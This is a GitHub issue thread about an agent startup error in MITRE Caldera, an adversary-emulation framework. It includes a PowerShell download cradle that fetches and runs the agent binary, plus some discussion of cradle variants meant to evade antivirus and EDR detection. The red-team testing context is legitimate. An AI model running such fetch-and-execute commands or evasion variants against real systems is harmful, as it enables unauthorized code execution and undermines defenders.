### ISSUE TITLE
Error: Encountered an error starting the process: "fork/exec powershell.exe: %1

### ISSUE THREAD

**Issue by royharoush** [mitre/caldera#1244]
Hi, 
When running almost any adversary action I get these error. 

`Encountered an error starting the process: "fork/exec powershell.exe: %1 is not a valid Win32 application."`
Running latest from Git. 

Anything I can do to fix it ? 
Thanks ! 
Roy

**Comment by privateducky** [comment]
can you confirm the agent starts up correctly? can you paste the console output you see when it starts?

**Comment by khyberspache** [comment]
What version of Python are you using? What architecture is the platform you're trying to run on?

**Comment by royharoush** [comment]
the agents are starting correctly and are connected. 
The agent is running on windows 10x64, with CB running. Also hyper-v is enabled so there's a chance credentials-guard is running, but I don't see an issue there. 

The server the kali AMI on AWS, fully updated.

**Comment by khyberspache** [comment]
Can you run this download cradle on the agent:

```$server="http://0.0.0.0:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and ([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;C:\Users\Public\$name.exe -server $server -v```

then run the operation and see what the agent out put says?

**Comment by royharoush** [comment]
this ps accesses the server and downloads the recompiled agent, but it doesn't run it. 

![image](https://user-images.githubusercontent.com/8113056/74920604-1b564700-53d5-11ea-99a3-f626869eb7d8.png)

![image](https://user-images.githubusercontent.com/8113056/74920559-05e11d00-53d5-11ea-8bb0-83f6893e4f59.png)

![image](https://user-images.githubusercontent.com/8113056/74923272-28753500-53d9-11ea-90a7-3bca62cdc38b.png)

When trying to run it manually with the suggested arguments from the ps script it fails. 

It actually required to have -server instead of -s , which is why the powershell script failed. 

As to my issue, it now seems to collect data ! 
Thanks ! 
Can you share more information on the nature of this fix ?

**Comment by privateducky** [comment]
@khyberspache can you confirm this is fixed in version 2.6.1+?

**Comment by khyberspache** [comment]
I haven't been able to recreate in 2.6.0+.  We had a bug where compilation variables from the download cradle weren't being passed to the compilation composition function so the LDFLAGS didn't contain the target server.

**Comment by privateducky** [comment]
@royharoush let us know if you notice this in version 2.6+, looks to be fixed

**Comment by royharoush** [comment]
haven't been able to run the agent in 2.6.0 due to the issue in #1334

I'll try to use a different cradle, but i think for useability sake we should be able to control the cradle payload size\functions to avoid edr\av detections. 

that being said i understand it's not a mild fix :) 
thanks for all your effort !

**Comment by privateducky** [comment]
on this topic, i have built in the concept of "variations" for all of our ability commands (including agent delivery commands). if you look at the agent modal -> deploy new agent (link) you'll see all the variations we currently have for each delivery command. 

you can select different ones per agent and try them out. also, feel free to submit new ones as a PR so we can grow these out, if we find specific commands are good to evade AV

**Comment by MichelleCersosimo** [comment]
For everyone also having this issue - it might be your security tool blocking the action - so check in your console for the command line and see if a particular blocked event was spin up.
